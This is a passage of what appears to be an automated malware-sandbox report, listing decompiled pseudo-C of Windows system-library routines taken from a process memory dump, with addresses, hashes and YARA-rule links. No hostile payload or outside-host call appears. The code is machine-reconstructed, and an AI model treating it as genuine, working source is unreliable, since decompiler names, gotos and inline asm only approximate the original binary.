						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E044376E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










            0x0445fd9b
            0x0445fda0
            0x0445fda1
            0x0445fdab
            0x0445fdad
            0x0445fdb0
            0x0445fdb8
            0x0445fe0f
            0x0445fde6
            0x0445fde9
            0x0445fdec
            0x0449c0c0
            0x0445fdfe
            0x0445fe06
            0x0445fe06
            0x0449c0c8
            0x0445fe2d
            0x0445fe2d
            0x00000000
            0x0445fe2d
            0x0449c0d1
            0x0449c0e0
            0x0449c0e5
            0x0449c0e5
            0x0449c0e8
            0x00000000
            0x0449c0e8
            0x0445fdf4
            0x00000000
            0x00000000
            0x0445fdf6
            0x0445fdfa
            0x0445fe1a
            0x0445fe1f
            0x0445fe1f
            0x0445fdfc
            0x00000000
            0x0445fdfc
            0x0445fdcc
            0x0445fdd0
            0x0445fe26
            0x00000000
            0x0445fe26
            0x0445fdd8
            0x0445fddb
            0x0445fddd
            0x0445fde0
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
            • Instruction ID: 6262d1ca5259a8f63cd6deb2e2f2dcd9e8b8e10eafb366cbe64b275e0e627e68
            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
            • Instruction Fuzzy Hash: D3216A72600640DBEF31CF4AC540A66B7E5EB94B10F24856FE94687B22E730BC09DB81
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04429240, Relevance: .1, Instructions: 63COMMON
            Download Yara Rule
            C-Code - Quality: 77%
            			E04429240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x44ff708);
				E0447D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E044695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E044695D0();
				_t33 =  *0x45184c4; // 0x0
				L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x45184c4; // 0x0
				L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x45184c4; // 0x0
				E04442280(L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x45186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E044695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E044695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04429325();
					_t50 =  *0x45184c4; // 0x0
					return E0447D0D1(L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















            0x04429240
            0x04429242
            0x04429247
            0x0442924c
            0x0442924e
            0x04429255
            0x04429257
            0x0442925a
            0x0442925f
            0x0442925f
            0x04429266
            0x04429271
            0x04429276
            0x04429279
            0x0442927e
            0x04429295
            0x0442929a
            0x044292b1
            0x044292b6
            0x044292d7
            0x044292dc
            0x044292e0
            0x044292e6
            0x044292e8
            0x044292ee
            0x04429332
            0x04429333
            0x04429337
            0x04429338
            0x0442933a
            0x0442933a
            0x0442933d
            0x04429342
            0x04429342
            0x04429345
            0x04429349
            0x0442934e
            0x04429352
            0x04429357
            0x044292f4
            0x044292f4
            0x044292f6
            0x044292f9
            0x04429300
            0x04429306
            0x04429324
            0x04429324

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: dc4aa8a4a5a3bb012ea9c30b1e820208d06fbd5cf94b2ae9ddddcbe9120bb237
            • Instruction ID: 8f9ee9c2bcc2bb419000cbb3e24bd6ed9571e68bd180c7aedbae8df534934bde
            • Opcode Fuzzy Hash: dc4aa8a4a5a3bb012ea9c30b1e820208d06fbd5cf94b2ae9ddddcbe9120bb237
            • Instruction Fuzzy Hash: F3215C72540600DFDB21EF29CA40F56B7B9FF08708F54496EE10A866B2CB74F945DB44
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445B390, Relevance: .1, Instructions: 63COMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E0445B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04442280(_t12, 0x4518608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E044600C2(0x4518608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











            0x0445b395
            0x0445b3a2
            0x0445b3a5
            0x0445b3aa
            0x0445b3b2
            0x0445b3ba
            0x0445b3bd
            0x0445b3c0
            0x0445b3c4
            0x0445b3c9
            0x0449a3e9
            0x0449a3ed
            0x0449a3f0
            0x0449a3ff
            0x0449a403
            0x0449a409
            0x00000000
            0x00000000
            0x0449a40b
            0x0449a40b
            0x0449a40f
            0x0449a415
            0x0449a423
            0x0449a423
            0x0449a415
            0x0445b3d1
            0x0445b3e8
            0x0445b3e8
            0x0445b3d9

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7f719e24059dd486987f22a6e20e0a1e21129af11d0a853c7b87672ceb018112
            • Instruction ID: a0091b5dfe26a889cb60e58036571818775163da771596fd4406ab6577bc4bbc
            • Opcode Fuzzy Hash: 7f719e24059dd486987f22a6e20e0a1e21129af11d0a853c7b87672ceb018112
            • Instruction Fuzzy Hash: 091144333011109FEF399A158D81A2B7796FBC5370B28012EED16E73A1DD31BC02D690
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A46A7, Relevance: .1, Instructions: 59COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E044A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0446F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0445D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L044477F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











            0x044a46b7
            0x044a46ba
            0x044a46c5
            0x044a46c8
            0x044a46d0
            0x044a46d4
            0x044a46e6
            0x044a46e9
            0x044a46f4
            0x044a46ff
            0x044a4705
            0x044a4706
            0x044a470c
            0x044a4713
            0x044a471b
            0x044a4723
            0x044a4725
            0x044a46d6
            0x044a46d9
            0x044a46db
            0x044a46db
            0x044a4732

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
            • Instruction ID: 0185384bd332ca12b91d144f2053df26a9b6e3a652b90120692732c8e8dcdfa5
            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
            • Instruction Fuzzy Hash: 06112572904208BBDB019F5DE8808BEF7B9EF95304F10806EF984CB351DA31AD55D7A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0443766D, Relevance: .1, Instructions: 54COMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E0443766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0445F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0445F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04444620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










            0x04437672
            0x0443767f
            0x04437689
            0x044376de
            0x044376de
            0x0443768b
            0x04437691
            0x04437693
            0x04437697
            0x00000000
            0x04437699
            0x044376a8
            0x00000000
            0x044376aa
            0x044376ad
            0x044376b1
            0x00000000
            0x044376b3
            0x044376b3
            0x044376b5
            0x044376ba
            0x044376bc
            0x044376bc
            0x044376c0
            0x00000000
            0x044376c2
            0x044376ce
            0x044376ce
            0x044376c0
            0x044376b1
            0x044376a8
            0x04437697
            0x044376d9

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
            • Instruction ID: fd167174fd45a32bc22468bfa27d4685d4a768f7e39ead2781efd8a0edf513db
            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
            • Instruction Fuzzy Hash: A4018872700119AFDF20AE5ECD55E5B77ADEB88B71B148526B948CB291DA30ED0187A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044BC450, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            C-Code - Quality: 46%
            			E044BC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04469910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E044695B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E044695D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E044695D0();
				return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






            0x044bc458
            0x044bc45d
            0x044bc466
            0x044bc468
            0x044bc469
            0x044bc46a
            0x044bc46b
            0x044bc46e
            0x044bc46f
            0x044bc471
            0x044bc476
            0x044bc476
            0x044bc47c
            0x044bc47e
            0x044bc480
            0x044bc480
            0x044bc483
            0x044bc484
            0x044bc486
            0x044bc488
            0x044bc48f
            0x044bc491
            0x044bc493
            0x044bc493
            0x044bc48f
            0x044bc498
            0x044bc49e
            0x044bc4ad
            0x044bc4ad
            0x044bc4b2
            0x044bc4b4
            0x044bc4cd

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
            • Instruction ID: 2fe817332c3fb5c89868a5299e76d1c487ef7d87520d728187938338b7f3b95b
            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
            • Instruction Fuzzy Hash: B60180B2140505BFEB21AF66CCC1EA3BB6EFB54394F00452BF25442661CB71BCA1CAB1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04429080, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            C-Code - Quality: 69%
            			E04429080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x45185ec;
				E04442280(_t48, 0x45185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0443FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x451538c; // 0x776f68c8
					if( *_t84 != 0x4515388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x44ff6e8);
						E0447D0E8(0x45185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E044F88F5(_t80, _t85, 0x4515388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x45186c0; // 0x1707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x45186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04442280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E044F88F5(0x45185ec, _t85, 0x4515388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0446AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x451b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x45184c0;
																			if(_t82 >=  *0x45184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E044F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0442922A(_t99);
										_t64 = E04447D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E044F8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x45186c0; // 0x1707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x45186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x45186bc;
													_t87 = 0x45186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04429240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x45186c4;
												_t87 = 0x45186c0;
												L27:
												E04459B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0447D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4515388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x451538c = _t51;
						goto L6;
					}
				}
			}




















            0x04429082
            0x04429083
            0x04429084
            0x04429085
            0x04429087
            0x04429096
            0x04429098
            0x04429098
            0x0442909e
            0x044290a8
            0x044290e7
            0x044290e7
            0x044290aa
            0x044290b0
            0x044290b7
            0x044290bd
            0x044290dd
            0x044290e6
            0x044290bf
            0x044290bf
            0x044290c7
            0x044290cf
            0x044290f1
            0x044290f2
            0x044290f4
            0x044290f5
            0x044290f6
            0x044290f7
            0x044290f8
            0x044290f9
            0x044290fa
            0x044290fb
            0x044290fc
            0x044290fd
            0x044290fe
            0x044290ff
            0x04429100
            0x04429102
            0x04429107
            0x0442910c
            0x04429110
            0x04429113
            0x04429115
            0x04429136
            0x0442913f
            0x04429143
            0x044837e4
            0x044837e4
            0x04429117
            0x04429117
            0x0442911d
            0x00000000
            0x0442911f
            0x0442911f
            0x04429125
            0x00000000
            0x04429127
            0x0442912d
            0x04429130
            0x04429134
            0x04429158
            0x0442915d
            0x04429161
            0x04429168
            0x04483715
            0x0442916e
            0x0442916e
            0x04429175
            0x04429177
            0x0442917e
            0x0442917f
            0x04429182
            0x04429182
            0x04429187
            0x04429187
            0x0442918a
            0x0442918d
            0x0442918f
            0x04429192
            0x04429195
            0x04429198
            0x04429198
            0x04429198
            0x0442919a
            0x00000000
            0x00000000
            0x0448371f
            0x04483721
            0x04483727
            0x0448372f
            0x04483733
            0x04483735
            0x04483738
            0x0448373b
            0x0448373d
            0x04483740
            0x00000000
            0x04483746
            0x04483746
            0x04483749
            0x00000000
            0x0448374f
            0x0448374f
            0x04483751
            0x04483757
            0x04483759
            0x0448375c
            0x0448375c
            0x0448375e
            0x0448375e
            0x04483761
            0x04483764
            0x00000000
            0x00000000
            0x04483766
            0x04483768
            0x044837a3
            0x044837a3
            0x044837a5
            0x044837a7
            0x044837ad
            0x044837b0
            0x044837b2
            0x044837bc
            0x044837c2
            0x044837c2
            0x044837b2
            0x04429187
            0x04429187
            0x0442918a
            0x0442918d
            0x0442918f
            0x04429192
            0x04429195
            0x00000000
            0x04429195
            0x00000000
            0x0448376a
            0x0448376a
            0x0448376a
            0x0448376c
            0x0448376c
            0x0448376f
            0x04483775
            0x00000000
            0x00000000
            0x04483777
            0x04483779
            0x04483782
            0x04483787
            0x04483789
            0x04483790
            0x04483790
            0x0448378b
            0x0448378b
            0x0448378b
            0x04483792
            0x04483795
            0x00000000
            0x04483795
            0x00000000
            0x04483779
            0x04483798
            0x00000000
            0x04483798
            0x00000000
            0x04483768
            0x0448379b
            0x0448379b
            0x04483751
            0x04483749
            0x00000000
            0x04483740
            0x044291a0
            0x044291a3
            0x044291a9
            0x044291b0
            0x00000000
            0x044291b0
            0x04429187
            0x044291b4
            0x044291b4
            0x044291bb
            0x044291c0
            0x044291c5
            0x044291c7
            0x044837da
            0x044291cd
            0x044291cd
            0x044291cd
            0x044291d2
            0x044291d5
            0x04429239
            0x04429239
            0x044291d7
            0x044291db
            0x044291e1
            0x044291e7
            0x044291fd
            0x04429203
            0x0442921e
            0x04429223
            0x00000000
            0x04429205
            0x04429205
            0x04429208
            0x0442920c
            0x04429214
            0x04429214
            0x0442920c
            0x044291e9
            0x044291e9
            0x044291ee
            0x044291f3
            0x044291f3
            0x044291f3
            0x044291e7
            0x00000000
            0x00000000
            0x00000000
            0x04429134
            0x04429125
            0x0442911d
            0x0442914e
            0x044290d1
            0x044290d1
            0x044290d3
            0x044290d6
            0x044290d8
            0x00000000
            0x044290d8
            0x044290cf

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 982607fecb3a12731cb923521be55062e0b1e40c43e09d70c163f6d0c3897007
            • Instruction ID: d249a19364c6bd65fd5197fe9397c2bcf60477f1343550731493cf9effd4e936
            • Opcode Fuzzy Hash: 982607fecb3a12731cb923521be55062e0b1e40c43e09d70c163f6d0c3897007
            • Instruction Fuzzy Hash: 2A01F4B26016189FEB249F05D940B12B7E9FF85724F65416BE6019B7A1D374FC41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F4015, Relevance: .0, Instructions: 49COMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E044F4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04442280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04442280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x45186ac);
					E0442F900(0x45186d4, _t28);
					E0443FFB0(0x45186ac, _t28, 0x45186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0443FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







            0x044f401a
            0x044f401e
            0x044f4023
            0x044f4028
            0x044f4029
            0x044f402b
            0x044f402f
            0x044f4043
            0x044f4046
            0x044f4051
            0x044f4057
            0x044f405f
            0x044f4062
            0x044f4067
            0x044f406f
            0x044f407c
            0x044f407c
            0x044f408c
            0x044f408c
            0x044f4097

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f74a63f3bb9bca4ab112eabb4ddd3b235354b1ddabfc42e4e992d9b2d8e3b4cb
            • Instruction ID: fc38db87d5296e9b9b2e5a57e0e5313cc2ebc519712e8073c950ea8d977e50e4
            • Opcode Fuzzy Hash: f74a63f3bb9bca4ab112eabb4ddd3b235354b1ddabfc42e4e992d9b2d8e3b4cb
            • Instruction Fuzzy Hash: 520188716019457FFA11AB6ACD80E13B7ACFB85754B00061BF60883A22CB24FC11C6E4
            Uniqueness

